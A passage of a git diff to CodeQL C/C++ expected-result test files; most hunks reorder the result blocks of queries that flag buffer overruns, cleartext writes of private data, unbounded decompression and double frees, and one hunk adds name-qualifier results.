| test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | -| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | -| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | -| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... 
| write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | edges | test.cpp:34:10:34:12 | buf | test.cpp:34:5:34:24 | access to array | provenance | Config | | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | provenance | Config | 
@@ -200,3 +178,25 @@ nodes | test.cpp:325:24:325:26 | end | semmle.label | end | | test.cpp:325:24:325:26 | end | semmle.label | end | subpaths +#select +| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | +| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | +| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | +| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | +| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | +| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... 
| write | +| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | +| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | +| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | +| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | +| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | +| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. 
| test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | +| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | +| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | +| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... 
| write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected index 99a27a469894..df8b26486f32 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected 
@@ -1,15 +1,3 @@ -#select -| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | -| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. | -| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. 
| test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | edges | test.cpp:45:18:45:23 | buffer | test.cpp:47:10:47:15 | buffer | provenance | | | test.cpp:47:10:47:15 | buffer | test.cpp:45:7:45:10 | *func | provenance | | 
@@ -44,3 +32,15 @@ nodes | test.cpp:99:61:99:70 | theZipcode | semmle.label | theZipcode | subpaths | test.cpp:81:22:81:28 | medical | test.cpp:45:18:45:23 | buffer | test.cpp:45:7:45:10 | *func | test.cpp:81:17:81:20 | call to func | +#select +| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | +| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. 
| +| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected index 363b2aafa0fa..b813f8532cb7 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected 
@@ -1,17 +1,3 @@ -#select -| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | -| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | -| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | -| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | -| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | -| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... 
| The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | call to inflate | inflate | -| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | -| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | -| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | -| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | -| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | edges | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:15:41:15:44 | **argv | provenance | | | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | provenance | | 
@@ -228,3 +214,17 @@ subpaths | zlibTest.cpp:83:19:83:25 | *access to array | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:83:19:83:25 | UnsafeInflate output argument | | zlibTest.cpp:84:18:84:24 | *access to array | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:84:18:84:24 | UnsafeGzread output argument | | zlibTest.cpp:85:19:85:25 | *access to array | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:85:19:85:25 | InflateString output argument | +#select +| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | +| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | +| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | +| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | +| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | 
The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | +| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... | The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | call to inflate | inflate | +| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | +| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | +| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | +| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | +| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | diff --git a/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected b/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected index 72d7d615c815..b5f2fe8dd744 100644 --- a/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected +++ b/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected 
@@ -1,3 +1,7 @@ +| inconsistency2.cpp:3:3:3:5 | T:: | inconsistency2.cpp:3:3:3:6 | x | inconsistency2.cpp:2:20:2:20 | T | +| inconsistency2.cpp:3:3:3:11 | const s:: | inconsistency2.cpp:3:3:3:6 | x | file://:0:0:0:0 | const s | +| inconsistency.cpp:7:20:7:22 | S:: | inconsistency.cpp:7:20:7:23 | (int)... | inconsistency.cpp:4:8:4:8 | S | +| inconsistency.cpp:7:20:7:22 | S:: | inconsistency.cpp:7:20:7:23 | A | inconsistency.cpp:4:8:4:8 | S | | name_qualifiers.cpp:29:7:29:8 | :: | name_qualifiers.cpp:29:7:29:9 | x | file://:0:0:0:0 | (global namespace) | | name_qualifiers.cpp:31:7:31:10 | N1:: | name_qualifiers.cpp:31:7:31:12 | nx | name_qualifiers.cpp:4:11:4:12 | N1 | | name_qualifiers.cpp:34:7:34:8 | :: | name_qualifiers.cpp:34:9:34:12 | N1:: | file://:0:0:0:0 | (global namespace) | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected index 290b5d8a9917..9636f170e0be 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected 
@@ -1,18 +1,3 @@ -#select -| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | -| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | -| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 | * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | -| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | -| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | -| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | edges | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | provenance | | | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | provenance | | 
@@ -58,3 +43,18 @@ nodes | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:322:12:322:12 | a | semmle.label | a | subpaths +#select +| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | +| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | 